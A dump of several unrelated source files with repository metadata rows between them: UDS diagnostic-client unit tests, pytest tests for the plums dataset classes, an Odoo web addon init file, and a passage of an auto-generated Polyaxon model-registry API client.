self.client_assert_response(self.do_client_request())
def test_dtc_duplicate(self):
self.wait_request_and_respond('\x59\x14\x12\x34\x56\x01\x12\x34\x56\x7E')
def _test_dtc_duplicate(self):
response = self.udsclient.get_dtc_fault_counter()
self.assertEqual(len(response.service_data.dtcs), 2) # We expect both entries; avoiding duplicates is the server's responsibility
self.assertEqual(response.service_data.dtcs[0].id, 0x123456)
self.assertEqual(response.service_data.dtcs[0].fault_counter, 0x01)
self.assertEqual(response.service_data.dtcs[1].id, 0x123456)
self.assertEqual(response.service_data.dtcs[1].fault_counter, 0x7E)
def test_normal_behaviour_zeropadding_ok_ignore_allzero(self):
data = '\x59\x14\x12\x34\x56\x01\x12\x34\x57\x7E'
for i in xrange(5):
self.wait_request_and_respond(data + '\x00' * (i+1))
def _test_normal_behaviour_zeropadding_ok_ignore_allzero(self):
self.udsclient.config[u'tolerate_zero_padding'] = True
self.udsclient.config[u'ignore_all_zero_dtc'] = True
for i in xrange(5):
self.client_assert_response(self.do_client_request(), expect_all_zero_third_dtc=False)
def test_normal_behaviour_zeropadding_ok_consider_allzero(self):
data = '\x59\x14\x12\x34\x56\x01\x12\x34\x57\x7E'
for i in xrange(5):
self.wait_request_and_respond(data + '\x00' * (i+1))
def _test_normal_behaviour_zeropadding_ok_consider_allzero(self):
self.udsclient.config[u'tolerate_zero_padding'] = True
self.udsclient.config[u'ignore_all_zero_dtc'] = False
expect_all_zero_third_dtc_values = [False, False, False, True, True]
for i in xrange(5):
self.client_assert_response(self.do_client_request(), expect_all_zero_third_dtc=expect_all_zero_third_dtc_values[i])
def test_normal_behaviour_zeropadding_notok_ignore_allzero_exception(self):
data = '\x59\x14\x12\x34\x56\x01\x12\x34\x57\x7E'
for i in xrange(5):
self.wait_request_and_respond(data + '\x00' * (i+1))
def _test_normal_behaviour_zeropadding_notok_ignore_allzero_exception(self):
self.udsclient.config[u'tolerate_zero_padding'] = False
self.udsclient.config[u'ignore_all_zero_dtc'] = True
must_return_invalid = [True, True, True, False, True]
expect_all_zero_third_dtc_values = [None, None, None, False, None]
for i in xrange(5):
if must_return_invalid[i]:
with self.assertRaises(InvalidResponseException):
self.do_client_request()
else:
self.client_assert_response(self.do_client_request(), expect_all_zero_third_dtc=expect_all_zero_third_dtc_values[i])
def test_normal_behaviour_zeropadding_notok_ignore_allzero_no_exception(self):
data = '\x59\x14\x12\x34\x56\x01\x12\x34\x57\x7E'
for i in xrange(5):
self.wait_request_and_respond(data + '\x00' * (i+1))
def _test_normal_behaviour_zeropadding_notok_ignore_allzero_no_exception(self):
self.udsclient.config[u'exception_on_invalid_response'] = False
self.udsclient.config[u'tolerate_zero_padding'] = False
self.udsclient.config[u'ignore_all_zero_dtc'] = True
must_return_invalid = [True, True, True, False, True]
expect_all_zero_third_dtc_values = [None, None, None, False, None]
for i in xrange(5):
response = self.do_client_request()
if must_return_invalid[i]:
self.assertFalse(response.valid)
else:
self.client_assert_response(response, expect_all_zero_third_dtc=expect_all_zero_third_dtc_values[i])
def test_normal_behaviour_zeropadding_notok_consider_allzero_exception(self):
data = '\x59\x14\x12\x34\x56\x01\x12\x34\x57\x7E'
for i in xrange(5):
self.wait_request_and_respond(data + '\x00' * (i+1))
def _test_normal_behaviour_zeropadding_notok_consider_allzero_exception(self):
self.udsclient.config[u'tolerate_zero_padding'] = False
self.udsclient.config[u'ignore_all_zero_dtc'] = False
must_return_invalid = [True, True, True, False, True]
expect_all_zero_third_dtc_values = [None, None, None, True, None]
for i in xrange(5):
if must_return_invalid[i]:
with self.assertRaises(InvalidResponseException):
self.do_client_request()
else:
self.client_assert_response(self.do_client_request(), expect_all_zero_third_dtc=expect_all_zero_third_dtc_values[i])
def test_normal_behaviour_zeropadding_notok_consider_allzero_no_exception(self):
data = '\x59\x14\x12\x34\x56\x01\x12\x34\x57\x7E'
for i in xrange(5):
self.wait_request_and_respond(data + '\x00' * (i+1))
def _test_normal_behaviour_zeropadding_notok_consider_allzero_no_exception(self):
self.udsclient.config[u'exception_on_invalid_response'] = False
self.udsclient.config[u'tolerate_zero_padding'] = False
self.udsclient.config[u'ignore_all_zero_dtc'] = False
must_return_invalid = [True, True, True, False, True]
expect_all_zero_third_dtc_values = [None, None, None, True, None]
for i in xrange(5):
response = self.do_client_request()
if must_return_invalid[i]:
self.assertFalse(response.valid)
else:
self.client_assert_response(response, expect_all_zero_third_dtc=expect_all_zero_third_dtc_values[i])
def test_no_dtc(self):
self.wait_request_and_respond("\x59\x14")
def _test_no_dtc(self):
response = self.do_client_request()
self.assertEqual(len(response.service_data.dtcs), 0)
self.assertEqual(response.service_data.dtc_count, 0)
def test_bad_response_subfunction_exception(self):
self.wait_request_and_respond("\x59\x15")
def _test_bad_response_subfunction_exception(self):
with self.assertRaises(UnexpectedResponseException):
self.do_client_request()
def test_bad_response_subfunction_no_exception(self):
self.wait_request_and_respond("\x59\x15")
def _test_bad_response_subfunction_no_exception(self):
self.udsclient.config[u'exception_on_unexpected_response'] = False
response = self.do_client_request()
self.assertTrue(response.valid)
self.assertTrue(response.unexpected)
def test_bad_response_service_exception(self):
self.wait_request_and_respond("\x6F\x14")
def _test_bad_response_service_exception(self):
with self.assertRaises(UnexpectedResponseException):
self.do_client_request()
def test_bad_response_service_no_exception(self):
self.wait_request_and_respond("\x6F\x14")
def _test_bad_response_service_no_exception(self):
self.udsclient.config[u'exception_on_unexpected_response'] = False
response = self.do_client_request()
self.assertTrue(response.valid)
self.assertTrue(response.unexpected)
def bad_response_length_server_task(self):
self.wait_request_and_respond("\x59")
self.wait_request_and_respond("\x59\x14\x12")
self.wait_request_and_respond("\x59\x14\x12\x34")
self.wait_request_and_respond("\x59\x14\x12\x34\x56")
self.wait_request_and_respond("\x59\x14\x12\x34\x56\x01\x12")
def test_bad_response_length_exception(self):
self.bad_response_length_server_task()
def _test_bad_response_length_exception(self):
for i in xrange(5):
with self.assertRaises(InvalidResponseException):
self.udsclient.get_dtc_fault_counter()
def test_bad_response_length_no_exception(self):
self.bad_response_length_server_task()
def _test_bad_response_length_no_exception(self):
self.udsclient.config[u'exception_on_invalid_response'] = False
for i in xrange(5):
response = self.do_client_request()
self.assertFalse(response.valid)
class TestReportDTCWithPermanentStatus(ClientServerTest, GenericTestNoParamRequest_DtcAndStatusMaskResponse): # Subfn = 0x15
def __init__(self, *args, **kwargs):
ClientServerTest.__init__(self, *args, **kwargs)
GenericTestNoParamRequest_DtcAndStatusMaskResponse.__init__(self, subfunction=0x15, client_function = u'get_dtc_with_permanent_status')
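# A minimal sketch (an assumption about the harness, not code from this suite) of the
# convention the classes above rely on: each test_xxx() method plays the server side
# and feeds canned response bytes through the mock connection, while the matching
# _test_xxx() method plays the client side. The ClientServerTest base presumably runs
# the two halves concurrently so that wait_request_and_respond() can answer the
# blocking UDS call issued by the client half.
import threading

def run_client_server_pair(testcase, name):
    server = threading.Thread(target=getattr(testcase, 'test_' + name))  # server half
    server.start()
    getattr(testcase, '_test_' + name)()  # client half, blocks until the server responds
    server.join()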
| 48.349304
| 236
| 0.718888
| 16,770
| 125,128
| 5.021884
| 0.022302
| 0.03092
| 0.038294
| 0.045953
| 0.964853
| 0.95717
| 0.94602
| 0.937495
| 0.927544
| 0.919874
| 0
| 0.059347
| 0.175596
| 125,128
| 2,587
| 237
| 48.367994
| 0.757057
| 0.015768
| 0
| 0.833928
| 0
| 0.032603
| 0.098148
| 0.077544
| 0
| 0
| 0.017241
| 0.000387
| 0.264391
| 1
| 0.219052
| false
| 0.004075
| 0.004075
| 0.006113
| 0.245033
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
718db45d090da663bb49e8819ffb25edf812e9b5
| 8,078
|
py
|
Python
|
tests/test_dataflow/test_dataset/test_base.py
|
alexandreMayerowitz/playground-plums
|
a6be79e4c30c7abcbade5581f052a4e8035a2057
|
[
"MIT"
] | null | null | null |
tests/test_dataflow/test_dataset/test_base.py
|
alexandreMayerowitz/playground-plums
|
a6be79e4c30c7abcbade5581f052a4e8035a2057
|
[
"MIT"
] | null | null | null |
tests/test_dataflow/test_dataset/test_base.py
|
alexandreMayerowitz/playground-plums
|
a6be79e4c30c7abcbade5581f052a4e8035a2057
|
[
"MIT"
] | 2
|
2021-02-03T12:37:53.000Z
|
2022-03-09T03:48:12.000Z
|
import pytest
import numpy as np
from plums.dataflow.dataset import Dataset, SizedDataset, Subset, ConcatDataset
class ConcreteDataset(Dataset):
def __init__(self, array):
self.array = array
def __getitem__(self, item):
return self.array[item]
class ConcreteSizedDataset(SizedDataset):
def __init__(self, array):
self.array = array
def __getitem__(self, item):
return self.array[item]
def __len__(self):
return len(self.array)
class ArrayDataset(SizedDataset):
def __init__(self, *arrays):
assert all(arrays[0].shape[0] == array.shape[0] for array in arrays)
self.arrays = arrays
def __getitem__(self, index):
return tuple(array[index] for array in self.arrays)
def __len__(self):
return self.arrays[0].shape[0]
def test_abstract():
with pytest.raises(TypeError):
_ = Dataset()
with pytest.raises(TypeError):
_ = SizedDataset()
def test_subset():
dataset = ConcreteDataset([1, 2, 3, 4, 5, 6])
subset = Subset(dataset, [1, 3, 5])
assert len(subset) == 3
with pytest.raises(TypeError):
len(dataset)
assert dataset[0] == 1
assert subset[0] == 2
assert dataset[2] == 3
assert subset[2] == 6
assert dataset[3] == 4
with pytest.raises(IndexError):
_ = subset[3]
dataset = ConcreteSizedDataset([1, 2, 3, 4, 5, 6])
subset = Subset(dataset, [1, 3, 5])
assert len(dataset) == 6
assert len(subset) == 3
assert dataset[0] == 1
assert subset[0] == 2
assert dataset[2] == 3
assert subset[2] == 6
assert dataset[3] == 4
with pytest.raises(IndexError):
_ = subset[3]
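# A minimal sketch (an assumption, not the plums source) of the remapping the Subset
# assertions above rely on: subset[i] is dataset[indices[i]], and the subset's length
# is the number of indices even when the wrapped dataset does not implement __len__.
class SubsetSketch:
    def __init__(self, dataset, indices):
        self._dataset, self._indices = dataset, list(indices)
    def __getitem__(self, item):
        # IndexError falls out naturally once item runs past len(self._indices)
        return self._dataset[self._indices[item]]
    def __len__(self):
        return len(self._indices)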
class TestConcatDataset:
def test_concat_two_singletons(self):
result = ConcatDataset([[0], [1]])
assert len(result) == 2
assert result.cumulative_size == (1, 2)
assert result[0] == 0
assert result[1] == 1
assert result[0] == result[-2]
result = ConcatDataset(ConcreteSizedDataset([0]), [1])
assert len(result) == 2
assert result.cumulative_size == (1, 2)
assert result[0] == 0
assert result[1] == 1
assert result[0] == result[-2]
def test_concat_two_non_singletons(self):
result = ConcatDataset([[0, 1, 2, 3, 4],
[5, 6, 7, 8, 9]])
assert len(result) == 10
assert result.cumulative_size == (5, 10)
assert result[0] == 0
assert result[5] == 5
assert result[0] == result[-10]
result = ConcatDataset(ConcreteSizedDataset([0, 1, 2, 3, 4]),
[5, 6, 7, 8, 9])
assert len(result) == 10
assert result.cumulative_size == (5, 10)
assert result[0] == 0
assert result[5] == 5
assert result[0] == result[-10]
def test_concat_two_non_singletons_with_empty(self):
# Adding an empty dataset somewhere is correctly handled
result = ConcatDataset([[0, 1, 2, 3, 4],
[],
[5, 6, 7, 8, 9]])
assert len(result) == 10
assert result.cumulative_size == (5, 5, 10)
assert result[0] == 0
assert result[5] == 5
assert result[0] == result[-10]
result = ConcatDataset(ConcreteSizedDataset([0, 1, 2, 3, 4]),
[],
[5, 6, 7, 8, 9])
assert len(result) == 10
assert result.cumulative_size == (5, 5, 10)
assert result[0] == 0
assert result[5] == 5
assert result[0] == result[-10]
def test_concat_raises_index_error(self):
result = ConcatDataset([[0, 1, 2, 3, 4],
[5, 6, 7, 8, 9]])
with pytest.raises(IndexError):
_ = result[10]
with pytest.raises(IndexError):
_ = result[11]
with pytest.raises(IndexError):
_ = result[-11]
result = ConcatDataset(ConcreteSizedDataset([0, 1, 2, 3, 4]),
[5, 6, 7, 8, 9])
with pytest.raises(IndexError):
_ = result[10]
with pytest.raises(IndexError):
_ = result[11]
with pytest.raises(IndexError):
_ = result[-11]
def test_non_iterable_raises_type_error(self):
with pytest.raises(TypeError):
_ = ConcatDataset(1, ConcreteSizedDataset([2, 3]))
def test_false_raises_value_error(self):
with pytest.raises(ValueError):
_ = ConcatDataset((), ConcreteSizedDataset([2, 3]))
with pytest.raises(ValueError):
_ = ConcatDataset(0, ConcreteSizedDataset([2, 3]))
def test_non_sized_raises_type_error(self):
with pytest.raises(TypeError):
_ = ConcatDataset([ConcreteDataset([0, 1]), ConcreteSizedDataset([2, 3])])
with pytest.raises(TypeError):
_ = ConcatDataset([ConcreteSizedDataset([0, 1]), ConcreteDataset([2, 3])])
with pytest.raises(TypeError):
_ = ConcatDataset([ConcreteDataset([0, 1]), ConcreteDataset([2, 3])])
def test_add_dataset(self):
dataset_1 = ArrayDataset(np.random.rand(7, 3, 28, 28))
dataset_2 = ArrayDataset(np.random.rand(7, 3, 28, 28))
dataset_3 = ArrayDataset(np.random.rand(7, 3, 28, 28))
result = dataset_1 + dataset_2 + dataset_3
assert len(result) == 21
assert result.cumulative_size == (14, 21)
assert np.absolute(dataset_1[0][0] - result[0][0]).sum() == 0
assert np.absolute(dataset_2[0][0] - result[7][0]).sum() == 0
assert np.absolute(dataset_3[0][0] - result[14][0]).sum() == 0
def test_cat_dataset(self):
dataset_1 = ArrayDataset(np.random.rand(7, 3, 28, 28))
dataset_2 = ArrayDataset(np.random.rand(7, 3, 28, 28))
dataset_3 = ArrayDataset(np.random.rand(7, 3, 28, 28))
result = dataset_1.cat(dataset_2, dataset_3)
assert len(result) == 21
assert result.cumulative_size == (7, 14, 21)
assert np.absolute(dataset_1[0][0] - result[0][0]).sum() == 0
assert np.absolute(dataset_2[0][0] - result[7][0]).sum() == 0
assert np.absolute(dataset_3[0][0] - result[14][0]).sum() == 0
def test_cat_add_dataset(self):
dataset_1 = ArrayDataset(np.random.rand(7, 3, 28, 28))
dataset_2 = ArrayDataset(np.random.rand(7, 3, 28, 28))
dataset_3 = ArrayDataset(np.random.rand(7, 3, 28, 28))
result = dataset_1.cat(dataset_2 + dataset_3)
assert len(result) == 21
assert result.cumulative_size == (7, 21)
assert np.absolute(dataset_1[0][0] - result[0][0]).sum() == 0
assert np.absolute(dataset_2[0][0] - result[7][0]).sum() == 0
assert np.absolute(dataset_3[0][0] - result[14][0]).sum() == 0
def test_add_cat_dataset(self):
dataset_1 = ArrayDataset(np.random.rand(7, 3, 28, 28))
dataset_2 = ArrayDataset(np.random.rand(7, 3, 28, 28))
dataset_3 = ArrayDataset(np.random.rand(7, 3, 28, 28))
result = dataset_1 + dataset_2.cat(dataset_3)
assert len(result) == 21
assert result.cumulative_size == (7, 21)
assert np.absolute(dataset_1[0][0] - result[0][0]).sum() == 0
assert np.absolute(dataset_2[0][0] - result[7][0]).sum() == 0
assert np.absolute(dataset_3[0][0] - result[14][0]).sum() == 0
def test_add_non_sized_raises(self):
with pytest.raises(TypeError):
_ = ConcreteSizedDataset([0, 1]) + ConcreteDataset([2, 3])
with pytest.raises(TypeError):
_ = ConcreteDataset([0, 1]) + ConcreteSizedDataset([2, 3])
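# A minimal sketch (an assumption, not the plums implementation) of the index
# arithmetic the ConcatDataset tests above exercise: cumulative_size holds the running
# totals of the child lengths, and a (possibly negative) global index is mapped to a
# (child, local index) pair by bisecting over those totals.
import bisect
from itertools import accumulate

def locate(sizes, index):
    cumulative = list(accumulate(sizes))  # e.g. [5, 10] for two 5-item children
    total = cumulative[-1]
    if index < 0:
        index += total  # result[-10] aliases result[0] in the tests above
    if not 0 <= index < total:
        raise IndexError(index)
    child = bisect.bisect_right(cumulative, index)
    local = index - (cumulative[child - 1] if child else 0)
    return child, local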
| 34.818966
| 86
| 0.576752
| 1,016
| 8,078
| 4.441929
| 0.079724
| 0.074452
| 0.077997
| 0.066475
| 0.831819
| 0.782406
| 0.748061
| 0.748061
| 0.748061
| 0.731221
| 0
| 0.073443
| 0.280267
| 8,078
| 231
| 87
| 34.969697
| 0.702786
| 0.006685
| 0
| 0.740331
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.353591
| 1
| 0.121547
| false
| 0
| 0.016575
| 0.027624
| 0.187845
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
71b16f2ea19ada1d4d81daf7eeb18de3c699cb85
| 175
|
py
|
Python
|
web/addons/web/__init__.py
|
diogocs1/comps
|
63df07f6cf21c41e4527c06e2d0499f23f4322e7
|
[
"Apache-2.0"
] | 1
|
2019-12-29T11:53:56.000Z
|
2019-12-29T11:53:56.000Z
|
odoo/addons/web/__init__.py
|
tuanquanghpvn/odoo8-tutorial
|
52d25f1ca5f233c431cb9d3b24b79c3b4fb5127e
|
[
"MIT"
] | null | null | null |
odoo/addons/web/__init__.py
|
tuanquanghpvn/odoo8-tutorial
|
52d25f1ca5f233c431cb9d3b24b79c3b4fb5127e
|
[
"MIT"
] | 3
|
2020-10-08T14:42:10.000Z
|
2022-01-28T14:12:29.000Z
|
import sys
# Mock deprecated openerp.addons.web.http module
import openerp.http
sys.modules['openerp.addons.web.http'] = openerp.http
http = openerp.http
import controllers
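# A generic sketch of the same aliasing trick with hypothetical names: registering a
# module object in sys.modules makes the old import path resolve to the replacement
# without any file existing at that path. (For a dotted name like the one above, the
# parent packages must already be importable; a flat name needs nothing else.)
import sys
import types

replacement = types.ModuleType('replacement')
replacement.answer = 42
sys.modules['legacy_api'] = replacement  # alias the retired module name

import legacy_api  # resolved straight from sys.modules, no legacy_api.py on disk
assert legacy_api.answer == 42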
| 19.444444
| 53
| 0.794286
| 25
| 175
| 5.56
| 0.44
| 0.23741
| 0.230216
| 0.28777
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.108571
| 175
| 8
| 54
| 21.875
| 0.891026
| 0.262857
| 0
| 0
| 0
| 0
| 0.181102
| 0.181102
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.6
| 0
| 0.6
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
e0b365e217b6ab202cc1f4fd1aec3637b616d482
| 153,583
|
py
|
Python
|
sdks/python/http_client/v1/polyaxon_sdk/api/model_registry_v1_api.py
|
vishalbelsare/polyaxon
|
aa02c6a62f7c0ef64eed048d9f3ba2be92984b6c
|
[
"Apache-2.0"
] | null | null | null |
sdks/python/http_client/v1/polyaxon_sdk/api/model_registry_v1_api.py
|
vishalbelsare/polyaxon
|
aa02c6a62f7c0ef64eed048d9f3ba2be92984b6c
|
[
"Apache-2.0"
] | 51
|
2021-04-06T07:59:21.000Z
|
2022-03-29T01:08:22.000Z
|
sdks/python/http_client/v1/polyaxon_sdk/api/model_registry_v1_api.py
|
vishalbelsare/polyaxon
|
aa02c6a62f7c0ef64eed048d9f3ba2be92984b6c
|
[
"Apache-2.0"
] | null | null | null |
#!/usr/bin/python
#
# Copyright 2018-2021 Polyaxon, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# coding: utf-8
"""
Polyaxon SDKs and REST API specification.
Polyaxon SDKs and REST API specification. # noqa: E501
The version of the OpenAPI document: 1.8.4
Contact: contact@polyaxon.com
Generated by: https://openapi-generator.tech
"""
from __future__ import absolute_import
import re # noqa: F401
# python 2 and python 3 compatibility library
import six
from polyaxon_sdk.api_client import ApiClient
from polyaxon_sdk.exceptions import ( # noqa: F401
ApiTypeError,
ApiValueError
)
class ModelRegistryV1Api(object):
"""NOTE: This class is auto generated by OpenAPI Generator
Ref: https://openapi-generator.tech
Do not edit the class manually.
"""
def __init__(self, api_client=None):
if api_client is None:
api_client = ApiClient()
self.api_client = api_client
def archive_model_registry(self, owner, name, **kwargs): # noqa: E501
"""Archive registry model # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.archive_model_registry(owner, name, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str owner: Owner of the namespace (required)
:param str name: Component under namespace (required)
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.archive_model_registry_with_http_info(owner, name, **kwargs) # noqa: E501
def archive_model_registry_with_http_info(self, owner, name, **kwargs): # noqa: E501
"""Archive registry model # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.archive_model_registry_with_http_info(owner, name, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str owner: Owner of the namespace (required)
:param str name: Component under namespace (required)
:param _return_http_data_only: response data without head status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: None
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = [
'owner',
'name'
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method archive_model_registry" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'owner' is set
if self.api_client.client_side_validation and ('owner' not in local_var_params or # noqa: E501
local_var_params['owner'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `owner` when calling `archive_model_registry`") # noqa: E501
# verify the required parameter 'name' is set
if self.api_client.client_side_validation and ('name' not in local_var_params or # noqa: E501
local_var_params['name'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `name` when calling `archive_model_registry`") # noqa: E501
collection_formats = {}
path_params = {}
if 'owner' in local_var_params:
path_params['owner'] = local_var_params['owner'] # noqa: E501
if 'name' in local_var_params:
path_params['name'] = local_var_params['name'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['ApiKey'] # noqa: E501
return self.api_client.call_api(
'/api/v1/{owner}/registry/{name}/archive', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None, # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
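# A short usage sketch (hypothetical owner/name values; assumes the package re-exports
# ApiClient and ModelRegistryV1Api at the top level, as openapi-generator clients
# normally do) of the two calling conventions the docstrings above describe:
# blocking by default, thread-backed when async_req=True is passed through **kwargs.
#
#   import polyaxon_sdk
#   api = polyaxon_sdk.ModelRegistryV1Api(polyaxon_sdk.ApiClient())
#   api.archive_model_registry('acme', 'churn-model')                        # synchronous call
#   thread = api.archive_model_registry('acme', 'churn-model', async_req=True)
#   thread.get()                                                             # block until the request completes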
def bookmark_model_registry(self, owner, name, **kwargs): # noqa: E501
"""Bookmark registry model # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.bookmark_model_registry(owner, name, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str owner: Owner of the namespace (required)
:param str name: Component under namespace (required)
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.bookmark_model_registry_with_http_info(owner, name, **kwargs) # noqa: E501
def bookmark_model_registry_with_http_info(self, owner, name, **kwargs): # noqa: E501
"""Bookmark registry model # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.bookmark_model_registry_with_http_info(owner, name, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str owner: Owner of the namespace (required)
:param str name: Component under namespace (required)
:param _return_http_data_only: response data without head status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: None
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = [
'owner',
'name'
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method bookmark_model_registry" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'owner' is set
if self.api_client.client_side_validation and ('owner' not in local_var_params or # noqa: E501
local_var_params['owner'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `owner` when calling `bookmark_model_registry`") # noqa: E501
# verify the required parameter 'name' is set
if self.api_client.client_side_validation and ('name' not in local_var_params or # noqa: E501
local_var_params['name'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `name` when calling `bookmark_model_registry`") # noqa: E501
collection_formats = {}
path_params = {}
if 'owner' in local_var_params:
path_params['owner'] = local_var_params['owner'] # noqa: E501
if 'name' in local_var_params:
path_params['name'] = local_var_params['name'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['ApiKey'] # noqa: E501
return self.api_client.call_api(
'/api/v1/{owner}/registry/{name}/bookmark', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None, # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def create_model_registry(self, owner, body, **kwargs): # noqa: E501
"""Create registry model # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.create_model_registry(owner, body, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str owner: Owner of the namespace (required)
:param V1ModelRegistry body: Model body (required)
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: V1ModelRegistry
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.create_model_registry_with_http_info(owner, body, **kwargs) # noqa: E501
def create_model_registry_with_http_info(self, owner, body, **kwargs): # noqa: E501
"""Create registry model # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.create_model_registry_with_http_info(owner, body, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str owner: Owner of the namespace (required)
:param V1ModelRegistry body: Model body (required)
:param _return_http_data_only: response data without head status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(V1ModelRegistry, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = [
'owner',
'body'
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method create_model_registry" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'owner' is set
if self.api_client.client_side_validation and ('owner' not in local_var_params or # noqa: E501
local_var_params['owner'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `owner` when calling `create_model_registry`") # noqa: E501
# verify the required parameter 'body' is set
if self.api_client.client_side_validation and ('body' not in local_var_params or # noqa: E501
local_var_params['body'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `body` when calling `create_model_registry`") # noqa: E501
collection_formats = {}
path_params = {}
if 'owner' in local_var_params:
